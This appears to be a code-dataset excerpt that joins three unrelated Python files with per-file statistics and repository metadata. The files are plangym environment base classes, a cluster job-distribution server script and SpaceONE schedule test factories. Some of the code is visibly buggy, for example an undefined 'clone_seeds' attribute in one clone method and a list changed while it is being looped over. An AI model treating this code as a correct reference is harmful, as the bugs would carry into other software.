STATE_IS_ARRAY = True
RETURNS_GYM_TUPLE = True
SINGLETON = False
def __init__(
self,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
):
"""
Initialize a :class:`Environment`.
Args:
name: Name of the environment.
frameskip: Number of times ``step`` will be called with the same action.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
"""
self._name = name
self.frameskip = frameskip
self.autoreset = autoreset
self.delay_init = delay_init
if not delay_init:
self.init_env()
@property
def unwrapped(self) -> "BaseEnvironment":
"""
Completely unwrap this Environment.
Returns:
plangym.Environment: The base non-wrapped plangym.Environment instance
"""
return self
@property
def name(self) -> str:
"""Return is the name of the environment."""
return self._name
@property
def obs_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the observations returned by the Environment."""
raise NotImplementedError()
@property
def action_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the actions applied to the Environment."""
raise NotImplementedError()
def __del__(self):
"""Teardown the Environment when it is no longer needed."""
return self.close()
def step(
self,
action: Union[numpy.ndarray, int, float],
state: numpy.ndarray = None,
dt: int = 1,
) -> tuple:
"""
Step the environment applying the supplied action.
Optionally set the state to the supplied state before stepping it.
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
state: Set the environment to the given state before stepping it.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
if state is not None:
self.set_state(state)
obs, reward, terminal, info = self.step_with_dt(action=action, dt=dt)
if state is not None:
new_state = self.get_state()
data = new_state, obs, reward, terminal, info
else:
data = obs, reward, terminal, info
if terminal and self.autoreset:
self.reset(return_state=False)
return data
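    # Worked example of the time semantics: with ``frameskip=4`` and ``dt=3`` a
    # single ``step`` call advances the underlying simulation by 3 * 4 = 12
    # frames, applying the same action throughout.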
def step_batch(
self,
actions: Union[numpy.ndarray, Iterable[Union[numpy.ndarray, int]]],
states: Union[numpy.ndarray, Iterable] = None,
dt: Union[int, numpy.ndarray] = 1,
) -> Tuple[numpy.ndarray, ...]:
"""
        Vectorized version of the `step` method. It allows stepping a vector of \
        states and actions.
        The signature and behaviour are the same as `step`, but it takes lists of \
        states, actions and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)``
else returns ``(new_states, observs, rewards, ends, infos)``
"""
dt = (
dt
if isinstance(dt, (numpy.ndarray, Iterable))
else numpy.ones(len(actions), dtype=int) * dt
)
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
data = [self.step(action, state, dt=dt) for action, state, dt in zip(actions, states, dt)]
return tuple(list(x) for x in zip(*data))
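    # Illustrative (assumed) call: a scalar ``dt`` is broadcast to one entry per
    # action, so each of the three transitions below advances 2 * frameskip frames.
    #
    # observs, rewards, terminals, infos = env.step_batch(actions=[0, 1, 1], dt=2)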
def init_env(self) -> None:
"""
Run environment initialization.
        Including in this function all the code that makes the environment impossible
        to serialize allows the environment to be dispatched to different workers and
        initialized once it has been copied to the target process.
"""
pass
def close(self) -> None:
"""Tear down the current environment."""
pass
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
pass
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
tuple containing ``(observs, reward, terminal, info)``.
"""
raise NotImplementedError()
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
raise NotImplementedError()
def get_state(self) -> Any:
"""
Recover the internal state of the simulation.
A state must completely describe the Environment at a given moment.
"""
raise NotImplementedError()
def set_state(self, state: Any) -> None:
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
Returns:
None
"""
raise NotImplementedError()
def get_image(self) -> Union[None, np.ndarray]:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return None
def clone(self) -> "BaseEnvironment":
"""Return a copy of the environment."""
raise NotImplementedError()
class PlanEnvironment(BaseEnvironment):
"""Base class for implementing OpenAI ``gym`` environments in ``plangym``."""
def __init__(
self,
name: str,
frameskip: int = 1,
episodic_live: bool = False,
autoreset: bool = True,
wrappers: Iterable[wrap_callable] = None,
delay_init: bool = False,
remove_time_limit=True,
):
"""
Initialize a :class:`PlanEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each ``dt``.
            episodic_live: Return ``end = True`` when losing a life.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
wrappers: Wrappers that will be applied to the underlying OpenAI env. \
Every element of the iterable can be either a :class:`gym.Wrapper` \
or a tuple containing ``(gym.Wrapper, kwargs)``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
"""
self._gym_env = None
self.episodic_life = episodic_live
self.remove_time_limit = remove_time_limit
self._wrappers = wrappers
super(PlanEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
@property
def gym_env(self):
"""Return the instance of the environment that is being wrapped by plangym."""
if self._gym_env is None and not self.SINGLETON:
self.init_env()
return self._gym_env
@property
def obs_shape(self) -> Tuple[int, ...]:
"""Tuple containing the shape of the observations returned by the Environment."""
return self.observation_space.shape
@property
def action_shape(self) -> Tuple[int, ...]:
"""Tuple containing the shape of the actions applied to the Environment."""
return self.action_space.shape
@property
def action_space(self) -> Space:
"""Return the action_space of the environment."""
return self.gym_env.action_space
@property
def observation_space(self) -> Space:
"""Return the observation_space of the environment."""
return self.gym_env.observation_space
@property
def reward_range(self):
"""Return the reward_range of the environment."""
if hasattr(self.gym_env, "reward_range"):
return self.gym_env.reward_range
@property
def metadata(self):
"""Return the metadata of the environment."""
if hasattr(self.gym_env, "metadata"):
return self.gym_env.metadata
def init_env(self):
"""Initialize the target :class:`gym.Env` instance."""
self._gym_env = self.init_gym_env()
if self._wrappers is not None:
self.apply_wrappers(self._wrappers)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode="rgb_array")
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
if self.gym_env is None and self.delay_init:
self.init_env()
obs = self.gym_env.reset()
return (self.get_state(), obs) if return_state else obs
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1):
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
reward = 0
obs, lost_live, terminal, oob = None, False, False, False
info = {"lives": -1}
n_steps = 0
for _ in range(int(dt)):
for _ in range(self.frameskip):
obs, _reward, _oob, _info = self.gym_env.step(action)
_info["lives"] = self.get_lives_from_info(_info)
lost_live = info["lives"] > _info["lives"] or lost_live
oob = oob or _oob
custom_terminal = self.custom_terminal_condition(info, _info, _oob)
terminal = terminal or oob or custom_terminal
terminal = (terminal or lost_live) if self.episodic_life else terminal
info = _info.copy()
reward += _reward
n_steps += 1
if terminal:
break
if terminal:
break
        # This allows recovering the original values even when using an episodic life environment
info["terminal"] = terminal
info["lost_live"] = lost_live
info["oob"] = oob
info["win"] = self.get_win_condition(info)
info["n_steps"] = n_steps
return obs, reward, terminal, info
def sample_action(self) -> Union[int, np.ndarray]:
"""Return a valid action that can be used to step the Environment chosen at random."""
if hasattr(self.action_space, "sample"):
return self.action_space.sample()
def clone(self) -> "PlanEnvironment":
"""Return a copy of the environment."""
return self.__class__(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
)
def close(self):
"""Close the underlying :class:`gym.Env`."""
if hasattr(self, "_gym_env") and hasattr(self._gym_env, "close"):
return self._gym_env.close()
def init_gym_env(self) -> gym.Env:
"""Initialize the :class:`gym.Env`` instance that the current class is wrapping."""
# Remove any undocumented wrappers
spec = gym_registry.spec(self.name)
if self.remove_time_limit:
if hasattr(spec, "max_episode_steps"):
spec._max_episode_steps = spec.max_episode_steps
if hasattr(spec, "max_episode_time"):
spec._max_episode_time = spec.max_episode_time
spec.max_episode_steps = None
spec.max_episode_time = None
gym_env: gym.Env = spec.make()
gym_env.reset()
return gym_env
def seed(self, seed=None):
"""Seed the underlying :class:`gym.Env`."""
if hasattr(self.gym_env, "seed"):
return self.gym_env.seed(seed)
def apply_wrappers(self, wrappers: Iterable[wrap_callable]):
"""Wrap the underlying OpenAI gym environment."""
for item in wrappers:
if isinstance(item, tuple):
wrapper, kwargs = item
self.wrap(wrapper, **kwargs)
else:
self.wrap(item)
def wrap(self, wrapper: Callable, *args, **kwargs):
"""Apply a single OpenAI gym wrapper to the environment."""
self._gym_env = wrapper(self.gym_env, *args, **kwargs)
@staticmethod
def get_lives_from_info(info: Dict[str, Any]) -> int:
"""Return the number of lives remaining in the current game."""
return info.get("lives", -1)
@staticmethod
def get_win_condition(info: Dict[str, Any]) -> bool:
"""Return ``True`` if the current state corresponds to winning the game."""
return False
@staticmethod
def custom_terminal_condition(old_info, new_info, oob) -> bool:
"""Calculate a new terminal condition using the info data."""
return False
def render(self, mode=None):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode=mode)
class VideogameEnvironment(PlanEnvironment):
"""Common interface for working with video games that run using an emulator."""
def __init__(
self,
name: str,
frameskip: int = 5,
episodic_live: bool = False,
autoreset: bool = True,
delay_init: bool = False,
remove_time_limit: bool = True,
obs_type: str = "rgb", # ram | rgb | grayscale
mode: int = 0, # game mode, see Machado et al. 2018
difficulty: int = 0, # game difficulty, see Machado et al. 2018
repeat_action_probability: float = 0.0, # Sticky action probability
full_action_space: bool = False, # Use all actions
render_mode: Optional[str] = None, # None | human | rgb_array
possible_to_win: bool = False,
wrappers: Iterable[wrap_callable] = None,
):
"""
Initialize a :class:`VideogameEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each step
in dt.
episodic_live: Return ``end = True`` when losing a life.
autoreset: Restart environment when reaching a terminal state.
delay_init: If ``True`` do not initialize the ``gym.Environment``
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
            obs_type: One of {"rgb", "ram", "grayscale"}.
mode: Integer or string indicating the game mode, when available.
difficulty: Difficulty level of the game, when available.
repeat_action_probability: Repeat the last action with this probability.
full_action_space: Whether to use the full range of possible actions
or only those available in the game.
            render_mode: One of {None, "human", "rgb_array"}.
possible_to_win: It is possible to finish the Atari game without
getting a terminal state that is not out of bounds
                or does not involve losing a life.
wrappers: Wrappers that will be applied to the underlying OpenAI env.
Every element of the iterable can be either a :class:`gym.Wrapper`
or a tuple containing ``(gym.Wrapper, kwargs)``.
"""
self._remove_time_limit = remove_time_limit
self.possible_to_win = possible_to_win
self._obs_type = obs_type
self._mode = mode
self._difficulty = difficulty
self._repeat_action_probability = repeat_action_probability
self._full_action_space = full_action_space
self._render_mode = render_mode
super(VideogameEnvironment, self).__init__(
name=name,
frameskip=frameskip,
episodic_live=episodic_live,
autoreset=autoreset,
wrappers=wrappers,
delay_init=delay_init,
)
@property
def obs_type(self) -> str:
"""Return the type of observation returned by the environment."""
return self._obs_type
@property
def mode(self) -> int:
"""Return the selected game mode for the current environment."""
return self._mode
@property
def difficulty(self) -> int:
"""Return the selected difficulty for the current environment."""
return self._difficulty
@property
def repeat_action_probability(self) -> float:
"""Probability of repeating the same action after input."""
return self._repeat_action_probability
@property
def full_action_space(self) -> bool:
"""If True the action space correspond to all possible actions in the Atari emulator."""
return self._full_action_space
@property
def render_mode(self) -> str:
"""Return how the game will be rendered. Values: None | human | rgb_array."""
return self._render_mode
@property
def has_time_limit(self) -> bool:
"""Return True if the Environment can only be stepped for a limited number of times."""
        return not self._remove_time_limit  # a removed time limit means the env can be stepped indefinitely
@property
def n_actions(self) -> int:
"""Return the number of actions available."""
return self.gym_env.action_space.n
def clone(self, **kwargs) -> "VideogameEnvironment":
"""Return a copy of the environment."""
params = dict(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
possible_to_win=self.possible_to_win,
clone_seeds=self.clone_seeds,
mode=self.mode,
difficulty=self.difficulty,
obs_type=self.obs_type,
repeat_action_probability=self.repeat_action_probability,
full_action_space=self.full_action_space,
render_mode=self.render_mode,
remove_time_limit=self._remove_time_limit,
)
params.update(**kwargs)
return self.__class__(**params)
def get_ram(self) -> np.ndarray:
"""Return the ram of the emulator as a numpy array."""
raise NotImplementedError()
class VectorizedEnvironment(BaseEnvironment, ABC):
"""
Base class that defines the API for working with vectorized environments.
    A vectorized environment allows stepping several copies of the environment in parallel
    when calling ``step_batch``.
    It creates a local copy of the environment that is the target of all the other
    methods of :class:`BaseEnvironment`. In practice, a :class:`VectorizedEnvironment`
acts as a wrapper of an environment initialized with the provided parameters when calling
__init__.
"""
def __init__(
self,
env_class,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
n_workers: int = 8,
**kwargs,
):
"""
Initialize a :class:`VectorizedEnvironment`.
Args:
env_class: Class of the environment to be wrapped.
name: Name of the environment.
            frameskip: Number of times ``step`` will be called with the same action.
autoreset: Ignored. Always set to True. Automatically reset the environment
when the OpenAI environment returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
n_workers: Number of workers that will be used to step the env.
**kwargs: Additional keyword arguments passed to env_class.__init__.
"""
self._n_workers = n_workers
self._env_class = env_class
self._env_kwargs = kwargs
self._plangym_env = None
self.SINGLETON = env_class.SINGLETON if hasattr(env_class, "SINGLETON") else False
self.RETURNS_GYM_TUPLE = (
env_class.RETURNS_GYM_TUPLE if hasattr(env_class, "RETURNS_GYM_TUPLE") else True
)
self.STATE_IS_ARRAY = (
env_class.STATE_IS_ARRAY if hasattr(env_class, "STATE_IS_ARRAY") else True
)
super(VectorizedEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
@property
def n_workers(self) -> int:
"""Return the number of parallel processes that run ``step_batch`` in parallel."""
return self._n_workers
@property
def plangym_env(self) -> BaseEnvironment:
"""Environment that is wrapped by the current instance."""
return self._plangym_env
@property
def obs_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the observations returned by the Environment."""
return self.plangym_env.obs_shape
@property
def action_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the actions applied to the Environment."""
return self.plangym_env.action_shape
@property
def gym_env(self):
"""Return the instance of the environment that is being wrapped by plangym."""
try:
return self.plangym_env.gym_env
except AttributeError:
return
def __getattr__(self, item):
"""Forward attributes to the wrapped environment."""
return getattr(self.plangym_env, item)
@staticmethod
def split_similar_chunks(
vector: Union[list, numpy.ndarray],
n_chunks: int,
) -> Generator[Union[list, numpy.ndarray], None, None]:
"""
Split an indexable object into similar chunks.
Args:
vector: Target indexable object to be split.
n_chunks: Number of similar chunks.
Returns:
Generator that returns the chunks created after splitting the target object.
"""
chunk_size = int(numpy.ceil(len(vector) / n_chunks))
for i in range(0, len(vector), chunk_size):
yield vector[i : i + chunk_size]
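    # Illustrative example (not part of the original class): splitting ten
    # items into three chunks uses chunk_size == ceil(10 / 3) == 4, so the
    # last chunk is shorter.
    #
    #   >>> list(VectorizedEnvironment.split_similar_chunks(list(range(10)), 3))
    #   [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]]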
@classmethod
def batch_step_data(cls, actions, states, dt, batch_size):
"""Make batches of step data to distribute across workers."""
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
dt = dt if isinstance(dt, numpy.ndarray) else numpy.ones(len(states), dtype=int) * dt
states_chunks = cls.split_similar_chunks(states, n_chunks=batch_size)
actions_chunks = cls.split_similar_chunks(actions, n_chunks=batch_size)
dt_chunks = cls.split_similar_chunks(dt, n_chunks=batch_size)
return states_chunks, actions_chunks, dt_chunks
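    # Illustrative example (not part of the original class): a scalar ``dt``
    # is first broadcast to one entry per action, so batching 4 actions with
    # dt=2 and batch_size=2 yields two chunks each of 2 actions, 2 states and
    # dt array([2, 2]).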
def create_env_callable(self, **kwargs) -> Callable[..., BaseEnvironment]:
"""Return a callable that initializes the environment that is being vectorized."""
def create_env_callable(env_class, **env_kwargs):
def _inner(**inner_kwargs):
env_kwargs.update(inner_kwargs)
return env_class(**env_kwargs)
return _inner
callable_kwargs = dict(
env_class=self._env_class,
name=self.name,
frameskip=self.frameskip,
delay_init=self._env_class.SINGLETON,
**self._env_kwargs,
)
callable_kwargs.update(kwargs)
return create_env_callable(**callable_kwargs)
def init_env(self) -> None:
"""Initialize the target environment with the parameters provided at __init__."""
self._plangym_env: BaseEnvironment = self.create_env_callable()()
self._plangym_env.init_env()
def step(self, action: numpy.ndarray, state: numpy.ndarray = None, dt: int = 1):
"""
Step the environment applying a given action from an arbitrary state.
        If ``state`` is not provided, the signature matches the one from OpenAI gym. \
        It allows applying arbitrary boundary conditions to define custom end states \
        in case the env was initialized with a ``CustomDeath`` object.
Args:
action: Array containing the action to be applied.
state: State to be set before stepping the environment.
dt: Consecutive number of times to apply the given action.
Returns:
            if state is None returns ``(observs, rewards, ends, infos)`` else \
            ``(new_states, observs, rewards, ends, infos)``.
"""
return self.plangym_env.step(action=action, state=state, dt=dt)
def reset(self, return_state: bool = True):
"""
        Reset the environment and return the first observation, or the first \
        (state, obs) tuple.
        Args:
            return_state: If True, also return the initial state of the env.
Returns:
Observation of the environment if `return_state` is False. Otherwise,
return (state, obs) after reset.
"""
state, obs = self.plangym_env.reset(return_state=True)
self.sync_states(state)
return (state, obs) if return_state else obs
def get_state(self):
"""
Recover the internal state of the simulation.
        A state completely describes the Environment at a given moment.
Returns:
State of the simulation.
"""
return self.plangym_env.get_state()
def set_state(self, state):
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
"""
self.plangym_env.set_state(state)
self.sync_states(state)
def render(self, mode="human"):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
return self.plangym_env.render(mode)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
        Square matrices are interpreted as greyscale images. Three-dimensional arrays
        are interpreted as RGB images with channels (Height, Width, RGB).
"""
return self.plangym_env.get_image()
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
If state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
return self.plangym_env.step_with_dt(action=action, dt=dt)
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
return self.plangym_env.sample_action()
def sync_states(self, state: None):
"""
Synchronize the workers' states with the state of ``self.gym_env``.
Set all the states of the different workers of the internal :class:`BatchEnv`\
to the same state as the internal :class:`Environment` used to apply the\
non-vectorized steps.
"""
raise NotImplementedError()
def step_batch(
self,
actions: numpy.ndarray,
states: numpy.ndarray = None,
        dt: Union[numpy.ndarray, int] = 1,
):
"""
Vectorized version of the ``step`` method.
        It allows stepping a vector of states and actions. The signature and \
        behaviour are the same as ``step``, but taking a list of states, actions \
        and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)`` else \
``(new_states, observs, rewards, ends, infos)``
"""
raise NotImplementedError()
def clone(self, **kwargs) -> "BaseEnvironment":
"""Return a copy of the environment."""
self_kwargs = dict(
name=self.name,
frameskip=self.frameskip,
delay_init=self.delay_init,
env_class=self._env_class,
n_workers=self.n_workers,
**self._env_kwargs,
)
self_kwargs.update(kwargs)
env = self.__class__(**self_kwargs)
return env
| 36.574635 | 99 | 0.613232 | 32,204 | 0.988217 | 617 | 0.018933 | 5,951 | 0.182613 | 0 | 0 | 16,116 | 0.494538 |
5f890b9328d6983928b109fecc583fe7148f59dc | 6,426 | py | Python | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | # Layer 2 server script
# project worker
'''-.
+#_pü'-.....
ö*+...:(loop):..............................................
m}°: \
€>!: 1. register clients \
&w^: 2. distribute WLs and add them to pending \
j/6: 3. move results to results dir \
@²%: 4. remove timed-out from pending and re-open them :§
#ß$: 5. check if done /
6@y: 6. backup and call htmlUpdate /
µ<§: /
%$":......................................................../
%&"$%!§.-´´´´
€$"!.-´
'''
import sys, os, pickle, shutil, htmlTool
from time import time, sleep
os.chdir(os.path.expanduser("~"))
project = sys.argv[-1]
projDir = f'apps/aligner/projects/{project}'
clientsDir = f'{projDir}/clients'
regDir = f'{projDir}/registrations'
backupDir = f'{projDir}/backup'
resDir = f'{projDir}/results'
def registerClient(ID):
print(f'{project}: \tregistering new client with ID {ID}')
os.mkdir(f'{clientsDir}/{ID}')
os.mkdir(f'{clientsDir}/{ID}/res')
os.mkdir(f'{clientsDir}/{ID}/res/done')
with open(f'{clientsDir}/{ID}/res/done/done','wb') as doneFile:
pickle.dump(0,doneFile)
def passWLs():
global openWLs, pendingWLs
clients = os.listdir(clientsDir)
for n in clients:
if os.path.exists(f'{clientsDir}/{n}/inactive'):
clients.remove(n)
for n in clients:
if os.path.exists(f'{clientsDir}/{n}/WL'):
if time()-os.path.getmtime(f'{clientsDir}/{n}/WL') > 3600:
print(f'{project}: \tclient {n} did not retrieve their workload... reassigning and setting to inactive')
wl = pickle.load(open(f'{clientsDir}/{n}/WL','rb'))
os.remove(f'{clientsDir}/{n}/WL')
for w in wl:
if w in pendingWLs:
i = pendingWLs.index(w)
del(pendingWLs[i])
del(assignmentTimes[i])
openWLs.insert(0,w)
with open(f'{clientsDir}/{n}/inactive','w') as tmp: pass
else:
tmp = min(min(128, int(len(openWLs)/len(clients))*4+1),len(openWLs))
if tmp > 0: print(f'{project}: \tassigned {tmp} workloads to client {n}')
wl = [openWLs.pop(0) for i in range(tmp)]
with open(f'{clientsDir}/{n}/WL_tmp','wb') as tmp:
pickle.dump(wl,tmp)
for i in wl:
pendingWLs.append(i)
assignmentTimes.append(time())
os.rename(f'{clientsDir}/{n}/WL_tmp',f'{clientsDir}/{n}/WL')
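# Illustrative numbers (not in the original): with 1000 open workloads and
# 10 active clients, the batch size above is min(128, 100*4 + 1, 1000) == 128;
# with only 30 open workloads it drops to min(128, 3*4 + 1, 30) == 13.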
def moveResults():
clientDirs = os.listdir(clientsDir)
stored = 0
for n in clientDirs:
resFiles = os.listdir(f'{clientsDir}/{n}/res')
resFiles.remove('done')
with open(f'{clientsDir}/{n}/res/done/done','rb') as doneFile:
doneWLs = pickle.load(doneFile)
for m in resFiles:
if os.path.getsize(f'{clientsDir}/{n}/res/'+m) == 0 and time()-os.path.getmtime(f'{clientsDir}/{n}/res/'+m)<60:
pass
else:
resIndex = int(m[m.find('.')+1:])
if resIndex in pendingWLs:
i = pendingWLs.index(resIndex)
alList = open(f'{clientsDir}/{n}/res/{m}','r').read().split('\n\n')
alList = [i for i in alList if i!='']
alignments = []
for al in alList:
tmp = al.split('\n')
tmp = [tuple(int(k) for k in tmp[j].split(';') if tmp[j]!='')
for j in range(len(tmp))]
alignments.append(tmp)
doneWLs += 1
with open(resDir+'/'+str(resIndex),'wb') as tmp:
pickle.dump(alignments,tmp)
os.remove(f'{clientsDir}/{n}/res/{m}')
# shutil.move(f'{clientsDir}/{n}/res/{m}',f'{resDir}/{m}')
stored += 1
del(pendingWLs[i])
del(assignmentTimes[i])
else:
os.remove(f'{clientsDir}/{n}/res/{m}')
with open(f'{clientsDir}/{n}/res/done/done','wb') as doneFile:
pickle.dump(doneWLs,doneFile)
if stored > 0: print(f'{project}: \tstored {stored} alignment parts in /results')
def reopen():
reNr = 0
for i in range(len(pendingWLs)-1,-1,-1):
if time()-assignmentTimes[i] > 1800:
openWLs.insert(0,pendingWLs[i])
del(pendingWLs[i])
del(assignmentTimes[i])
reNr += 1
if reNr > 0: print(f'{project}: \treopened {reNr} timed-out workloads')
def checkDone():
if len(pendingWLs) + len(openWLs) == 0:
print(f'{project}: \tproject finished')
return True
else: return False
def backup():
with open(f'{backupDir}/openWLs','w+b') as tmp:
pickle.dump(openWLs,tmp)
with open(f'{backupDir}/pendingWLs','w+b') as tmp:
pickle.dump(pendingWLs,tmp)
with open(f'{backupDir}/assignmentTimes','w+b') as tmp:
pickle.dump(assignmentTimes,tmp)
print(f'{project}: \tcreated backup')
# load from backup
with open(f'{backupDir}/openWLs','rb') as tmp:
openWLs = pickle.load(tmp)
with open(f'{backupDir}/pendingWLs','rb') as tmp:
pendingWLs = pickle.load(tmp)
with open(f'{backupDir}/assignmentTimes','rb') as tmp:
assignmentTimes = pickle.load(tmp)
print(f'{project}: \tretrieved data from project backup (open: {len(openWLs)}; pending: {len(pendingWLs)})')
backup_counter = 0
done = False
while not done:
# 1.
for ID in os.listdir(regDir):
registerClient(ID)
os.remove(f'{regDir}/{ID}')
# 2.
passWLs()
# 3.
moveResults()
# 4.
reopen()
# 5.
if checkDone(): done = True
# 6.
if backup_counter == 100 or done:
backup()
try: htmlTool.update()
except: pass
backup_counter = 0
if done:
os.rename(projDir,f'{projDir}__done__')
backup_counter += 1
sleep(1.74)
| 36.931034 | 124 | 0.495331 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,276 | 0.353197 |
5f8a8dc4b802b22d26a8494296192bb50d7f2d9a | 2,677 | py | Python | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | import factory
from spaceone.core import utils
from spaceone.statistics.model.schedule_model import Schedule, Scheduled, JoinQuery, Formula, QueryOption
class ScheduledFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Scheduled
cron = '*/5 * * * *'
interval = 5
minutes = [0, 10, 20, 30, 40, 50]
hours = [0, 6, 12, 18]
class JoinQueryFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = JoinQuery
keys = ['project_id']
type = 'LEFT'
data_source_id = factory.LazyAttribute(lambda o: utils.generate_id('ds'))
resource_type = 'inventory.Server'
query = {
'aggregate': {
'group': {
'keys': [{
'key': 'project_id',
'name': 'project_id'
}],
'fields': [{
'operator': 'count',
'name': 'server_count'
}]
}
}
}
class FormulaFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Formula
name = factory.LazyAttribute(lambda o: utils.random_string())
formula = 'a + (b / c)'
class QueryOptionFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = QueryOption
data_source_id = factory.LazyAttribute(lambda o: utils.generate_id('ds'))
resource_type = 'identity.Project'
query = {
'aggregate': {
'group': {
'keys': [{
'key': 'project_id',
'name': 'project_id'
}, {
'key': 'name',
'name': 'project_name'
}, {
'key': 'project_group.name',
'name': 'project_group_name'
}],
}
},
'sort': {
'name': 'resource_count',
'desc': True
},
'page': {
'limit': 5
}
}
join = factory.List([factory.SubFactory(JoinQueryFactory)])
formulas = factory.List([factory.SubFactory(FormulaFactory)])
class ScheduleFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Schedule
schedule_id = factory.LazyAttribute(lambda o: utils.generate_id('schedule'))
topic = factory.LazyAttribute(lambda o: utils.random_string())
state = 'ENABLED'
options = factory.SubFactory(QueryOptionFactory)
schedule = factory.SubFactory(ScheduledFactory)
tags = {
'key': 'value'
}
domain_id = utils.generate_id('domain')
created_at = factory.Faker('date_time')
last_scheduled_at = None
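# Illustrative usage in a test (not part of the original factories), assuming
# factory_boy semantics: ``build()`` creates an unsaved document, while
# ``create()`` would persist it through mongoengine.
#
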